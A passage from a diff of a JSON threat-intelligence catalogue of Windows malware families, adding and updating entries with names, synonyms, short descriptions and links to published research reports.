"https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", - "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] @@ -7814,8 +15013,6 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", - "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", - "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" ], "synonyms": [ @@ -7839,6 +15036,23 @@ "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", "value": "Evrial" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.wired.com/story/sandworm-centreon-russia-hack/", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dd68abd7-b20a-40a5-be53-ae8d45c1dd27", + "value": "Exaramel (Windows)" + }, { "description": "", "meta": { @@ -7882,15 +15096,33 @@ "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b", "value": "Exile RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", + "https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d742986c-04f0-48ef-aaa3-10eeb0e95be4", + "value": "Exorcist Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://blogs.360.cn/post/APT-C-44.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], "synonyms": [ "ExtRat" @@ -7915,28 +15147,27 @@ "value": "Eye Pyramid" }, { - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", + "description": "EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap. ", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", - "https://github.com/360netlab/DGA/issues/36", - "http://www.freebuf.com/column/153424.html" - ], - "synonyms": [ - "WillExec" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice", + "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://blog.malwarelab.pl/posts/nazar_eyservice/", + "https://www.epicturla.com/blog/the-lost-nazar", + "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/" ], + "synonyms": [], "type": [] }, - "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA" + "uuid": "9b287426-e82f-407e-8d12-42dac4241bf8", + "value": "EYService" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", - "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" @@ -7954,7 +15185,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/", + "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" ], "synonyms": [], "type": [] @@ -7966,12 +15198,45 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/" ], "synonyms": [], "type": [] }, + "uuid": "6eb3546c-cb8b-447c-81d1-9c4c1166581d", + "value": "FakeWord" + }, + { + "description": "FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter", + "https://www.epicturla.com/previous-works/hitb2020-voltron-sta" + ], + "synonyms": [ + "0xFancyFilter" + ], + "type": [] + }, + "uuid": "e7d06257-2bc6-45b6-8728-080df9932f90", + "value": "fancyfilter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1", + "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/" + ], + "synonyms": [ + "DEMENTIAWHEEL" + ], + "type": [] + }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, @@ -7993,7 +15258,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", - "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/" + "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/" ], "synonyms": [], "type": [] @@ -8001,14 +15268,29 @@ "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602", "value": "Farseer" }, + { + "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" + ], + "synonyms": [], + "type": [] + }, + "uuid": "21b86dbb-d000-449c-bfe4-41faede4bd89", + "value": "FastLoader" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/", + "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" + "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", + "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" ], "synonyms": [], "type": [] @@ -8016,6 +15298,33 @@ "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, + { + "description": "According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke", + "https://www.secureworks.com/research/threat-profiles/iron-hemlock", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4325c84b-9a9b-4e7c-977f-20d7ae817b7e", + "value": "FatDuke" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct", + "https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd", + "value": "FCT Ransomware" + }, { "description": "", "meta": { @@ -8052,6 +15361,7 @@ "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://en.wikipedia.org/wiki/Maksim_Yakubets", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" ], "synonyms": [ @@ -8067,14 +15377,15 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", - "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://twitter.com/3xp0rtblog/status/1321209656774135810" ], "synonyms": [], "type": [] }, - "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT" + "uuid": "6ad46852-24f3-4415-a4ab-57a52cd8a1cb", + "value": "Ficker Stealer" }, { "description": "", @@ -8089,6 +15400,20 @@ "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", "value": "FileIce" }, + { + "description": "Filerase is a .net API-based utility capable of propagating and recursively deleting files.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e5fbb536-4994-4bd5-b151-6d5e41ed9f5b", + "value": "Filerase" + }, { "description": "", "meta": { @@ -8119,17 +15444,22 @@ "value": "FindPOS" }, { - "description": "", + "description": "FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", + "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [ "FinSpy" @@ -8152,6 +15482,19 @@ "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat", + "https://twitter.com/casual_malware/status/1237775601035096064" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d63d92b-6d4d-470d-9f13-acce0c76911c", + "value": "FireBird RAT" + }, { "description": "", "meta": { @@ -8196,9 +15539,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", - "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf", + "https://securelist.com/the-flame-questions-and-answers-51/34344/", + "https://www.crysys.hu/publications/files/skywiper.pdf", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + ], + "synonyms": [ + "sKyWIper" ], - "synonyms": [], "type": [] }, "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", @@ -8218,15 +15568,30 @@ "value": "FLASHFLOOD" }, { - "description": "", + "description": "FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://www.youtube.com/watch?v=N4f2e8Mygag", + "https://habr.com/ru/company/pt/blog/475328/", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", - "https://github.com/Coldzer0/Ammyy-v3", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://attack.mitre.org/software/S0381/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], "synonyms": [], "type": [] @@ -8239,10 +15604,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://twitter.com/MsftSecIntel/status/1273359829390655488", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" ], - "synonyms": [], + "synonyms": [ + "GraceWire" + ], "type": [] }, "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", @@ -8266,14 +15642,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html" ], "synonyms": [], "type": [] @@ -8281,11 +15656,28 @@ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", + "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis", + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://nao-sec.org/2021/01/royal-road-redive.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b018c5a7-ab70-4df0-b5aa-ceb1efd4b541", + "value": "FlowCloud" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], @@ -8320,6 +15712,32 @@ "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", "value": "Flusihoc" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a6f4d003-abe5-46ed-9e71-555b067f4d5a", + "value": "FlyingDutchman" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio", + "https://www.eset.com/int/about/newsroom/press-releases/announcements/press-threatsense-report-july-2009/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "19228908-ba8b-4718-86b3-209c7f1ae0bf", + "value": "FlyStudio" + }, { "description": "", "meta": { @@ -8337,21 +15755,50 @@ "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f8d501bc-cf5a-4e19-a7fa-fb0aac18cc63", + "value": "FONIX" + }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", + "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://link.medium.com/uaBiIXgUU8", + "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", + "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html", + "https://isc.sans.edu/diary/26806", + "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/", - "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", - "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", + "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], @@ -8365,6 +15812,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", + "https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ @@ -8375,13 +15823,41 @@ "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", "value": "FormerFirstRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt", + "https://securelist.com/ransomware-two-pieces-of-good-news/93355/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "02caba7c-1820-40a3-94ae-dc89b5662b3e", + "value": "FortuneCrypt" + }, + { + "description": "A RAT employing Node.js, Sails, and Socket.IO to collect information on a target", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.frat", + "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md" + ], + "synonyms": [], + "type": [] + }, + "uuid": "695f3381-302f-4fd0-b7a5-4e852291ce91", + "value": "FRat" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" ], "synonyms": [], "type": [] @@ -8395,25 +15871,71 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ - "BitPaymer" + "BitPaymer", + "DoppelPaymer", + "IEncrypt" ], "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/#id5-2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "58eb97d1-0c29-4596-bd4a-4590b28d988f", + "value": 